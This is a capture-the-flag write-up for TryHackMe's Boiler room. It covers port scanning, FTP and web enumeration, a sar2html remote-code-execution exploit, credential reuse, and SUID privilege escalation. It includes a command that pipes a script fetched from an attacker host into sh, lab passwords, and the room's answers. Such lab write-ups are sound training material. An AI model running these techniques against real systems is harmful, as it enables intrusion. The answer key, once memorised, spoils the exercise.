TryHackMe — Boiler CTF — Write-Up

8 min readMay 15, 2024

Hi, everyone! In this article, I will share with you the solution of the “Boiler CTF” on the TryHackMe platform. I hope that it will be useful for you.

First, I am describing the overall stages that I have gone through. At the end of the article, you can find the answers to the questions as well.

Enjoy reading! 🍀

Stage 1. First, I started to run different Nmap scans in different terminals to enumerate the host. To save time, in one scan I searched for the top 1000 ports, while in another terminal I scanned the ports ranging from 10000 to 50000.

The commands I have used are shown below:

export IP_ADDRESS=<IP_ADDRESS> # exporting the ip address as a variable.

# To scan top 1000 ports:
sudo nmap -sC -sV -Pn -n --disable-arp-ping --top-ports=1000 $IP_ADDRESS

# To scan ports ranging from 10000 to 50000:
sudo nmap -sC -sV -Pn -n --disable-arp-ping -p10000-50000 $IP_ADDRESS

Results:

Port number 21: service — FTP, version — vsftpd 3.0.3; allowing anonymous login.

Port number 80: service — HTTP, version — Apache httpd 2.4.18; robots.txt file may contain interesting information.

Port number 10000: service — HTTP, version — MiniServ 1.930, Webmin httpd;

Figure 2. Scanning ports ranging from 10000 to 50000

As seen from the screenshots, the SSH port number is 55007 instead of the standard port 22, I noted that down as well because I might encounter it in the next stages.

Stage 2. Then I started to enumerate the FTP server. As it allows anonymous login, I entered anonymous as the username and login was successful.

A simple directory listing did not work for me, so I also searched for the hidden files.

Command: ls -a
Result: the file named “.info.txt”

To transfer the to my attacker machine, I used the get .info.txt command. All stages discussed so far are described in the following screenshot:

In another terminal, I read the contents of the secret file:

The first thing that came to my mind was that it might be one of the ciphers that were used to encrypt the content. I tried the ROT13 algorithm using CyberChef and finally was able to retrieve the original content:

Well, it seemed like a rabbithole. So, it was important to enumerate the other services as well.

Stage 3. I decided to enumerate the HTTP service running on the port number 80. The home page was a default Apache web page, as shown below:

Checking the robots.txt file:

There was an encoded string in the robots.txt file which might contain some useful information. I guessed that it might be an ASCII code, so I wrote a Python script like the following:

import base64

ascii_string="079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 078 084 069 049 079 068 081 075"
a = []

for i in ascii_string.split(' '):
    a.append(chr(int(i)))

res = ''.join(a)
print(base64.b64decode(res))

The script takes each ASCII value in the string, converts it to its corresponding char value in the ASCII table, and finally joins them together as a Base64-encoded string. To decode the string, I used the b64decode() function of the base64 library.

Running this code gave me a result like the following:

b’99b0660cd95adea327c54182baa51584\n’

I thought that the string ‘99b0660cd95adea327c54182baa51584’ might be an MD5 hash. However, to be sure, I used the hash-identifier tool:

I was right, it was an MD5 hash. Cracking the MD5 hash on an online tool gave me this result:

It was another rabbithole. It meant that I had to look for something useful in another way.

Stage 4. Analyzing the HTTP server running on port number 10000, over SSL, gave me a web page like the following:

I already knew that it was a Webmin web page, with version number 1.930. I searched for an example exploit in the exploit-db platform but found nothing useful, meaning that the service was up-to-date and I would not be able to find anything feasible.

Stage 5. Coming back to the HTTP service running on port 80, I decided to search for the directories. For this purpose, I used the ffuf tool. I consider ffuf a much more handy tool rather than gobuster in terms of syntax, but it is up to you, you can utilize whatever tool you want to use.

The syntax:

export IP_ADDRESS=<IP_ADDRESS>

ffuf -w <WORDLIST> -u http://$IP_ADDRESS:80/FUZZ

As a wordlist, I used /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt from the Seclists repository.

Result:

The result that drew my attention was the joomla directory found. Once I had switched to the corresponding web page, I revealed that the Content Management System (CMS) that had been used in the web application was Joomla.

Then I conducted another directory fuzzing but in the /joomla directory. The result was so interesting:

So much stuff was discovered, but the most interesting part was hidden in the _test page. Navigating to the /joomla/_test page gave me this:

As seen from the picture, the sar2html service was used in the application. I searched for an example exploit and found this, allowing Remote Code Execution:

I downloaded this file to my attacker machine and ran it with python3:

URL: http://<IP_ADDRESS>/joomla/_test/index.php
Command: ls

Voila! I was able to achieve RCE on the web service. But what was the log.txt file?

It was an SSH log file, where I could easily take the SSH credentials of the user basterd!

Credentials — basterd:superduperp@$$

I created an SSH connection to the victim machine as the user basterd, by using port number 55007, as initially discovered as the SSH service port:

Success!

To stabilize the shell, I used this Python script:

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

I was in the home directory, and simply running the ls command revealed that there was an interesting file called backup.sh, a file containing the credentials of another user!

Credentials — stoner:superduperp@$$no1knows

Using the su—stoner command, I was able to escalate to the user stoner.

There was a hidden file in the home directory, called .secret:

Stage 6. Finally, I needed to find a way to escalate my privileges and become the root user. For this purpose, I decided to use the privilege escalation called linpeas.sh.

This script can be easily obtained from GitHub. After downloading the script and saving it as a file named linpeas.sh, I made it an executable file in my attacker machine and started a Python HTTP server to access it from the victim machine.

From the host:

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh > linpeas.sh
chmod +x linpeas.sh

sudo python3 -m http.server 80

curl <ATTACKER_IP>/linpeas.sh | sh

Success!

Once the script was completed to execute, there was a lot of stuff to analyze. From the result, I found that I could run the find command as root and escalate my privileges, abusing SUID binaries.

I found the corresponding command in the GTFOBins platform:

Then I executed this command:

Figure 28. Privilege Escalation | Vertical

Voila!

The root.txt file was in the /root directory:

Questions

File extension after anonymous login: txt (remember the .info.txt file)
What is on the highest port: SSH (port number 55007)
What is running on port 10000: Webmin
Can you exploit the service running on that port: nay (the service was up-to-date)
What is CMS can you access: Joomla
The interesting file name in the folder: log.txt (remember where the credentials of the user basterd were obtained)
Where was the other user’s password stored (no extension, just the name): backup (remember that the credentials of the user stoner were in the backup.sh file)
user.txt: You made it till here, well done.
What did you exploit to get the privileged user: find
root.txt: It wasn’t that hard, was it?

Thanks for reading! 🍀

TryHackMe — Boiler CTF — Write-Up

Questions

Written by aCloverophile